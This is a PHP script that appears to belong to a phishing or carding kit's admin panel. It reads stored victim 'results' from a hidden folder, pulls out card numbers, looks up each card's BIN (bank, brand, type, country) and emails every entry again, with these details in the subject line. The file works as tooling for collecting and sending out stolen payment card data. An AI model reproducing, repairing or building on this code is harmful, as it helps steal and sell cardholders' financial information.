<?php
require_once dirname(__FILE__) . '/../header.php';
define('RESEND_RESULT', true);
if ($main->authIsAuthenticated()) {
    foreach ($main->resendReview($_JSON['unixtime'] ?? time()) as $key => $value) {
        $dir = dirname(__FILE__) . "/../../../.wexler/tmpresult";
        $path = $dir . '/' . $value['path'];
        $sessionid = $value['path'];
        if (file_exists($path)) {
            $tmpBody = '';
            $img = [];
            $types = [];
            $bin = [];
            
            // Get Result
            foreach (scandir($path) as $key => $value) {
                if (strlen($value) > 2 && is_file($path . '/' . $value)) {
                    $data = json_decode(file_get_contents($path . '/' . $value), true);
                    $tmpBody .= '[' . (isset($main->knownName[$data['type']]) ? $main->knownName[$data['type']] : $data['type']) . ']<br/>';
                    $types[] = (isset($main->knownName[$data['type']]) ? $main->knownName[$data['type']] : $data['type']);

                    // Some Shit
                    if ($data['type'] == "card") {
                        if (isset($data['cardNum'])) {
                            $tmpBIN = $main->binGetData(str_replace(' ', '', $data['cardNum']));
                            $binNum = substr(trim(str_replace(' ', '', $data['cardNum'])), 0, 6);
                            if (!empty($binNum)) {
                                $bin[] = $binNum;
                                
                            }
                            if (isset($tmpBIN['type'])) {
                                $bin[] = strtoupper($tmpBIN['type']);

                            }
                            if (isset($tmpBIN['brand'])) {
                                $bin[] = $tmpBIN['brand'];

                            }
                            if (isset($tmpBIN['bank']['name'])) {
                                $bin[] = $tmpBIN['bank']['name'];

                            }
                            if (isset($tmpBIN['country']['name'])) {
                                $bin[] = $tmpBIN['country']['name'];

                            }
                        }
                    }

                    unset($data['type']);
                    foreach ($data as $key => $value) {
                        $tmpBody .= "<b>" . (isset($main->knownName[$key]) ? $main->knownName[$key] : $key) . "</b>:&nbsp;" . htmlentities($value, ENT_QUOTES) . "<br/>";
    
                    }

                    $tmpBody .= "<br/>";
                }
            }

            // Send Result
            $main->sendmail('Result [ ' . join(' - ', $types) . ' ] [ ' . $sessionid . ' ]' . (empty($bin) ? '' : (' [ ' . implode(' - ', $bin) . ' ]')), $tmpBody);

        }
    }
    die(json_encode([
        'status' => true,
        'message' => 'All result has been resend!',
        'data' => [],
    ]));
}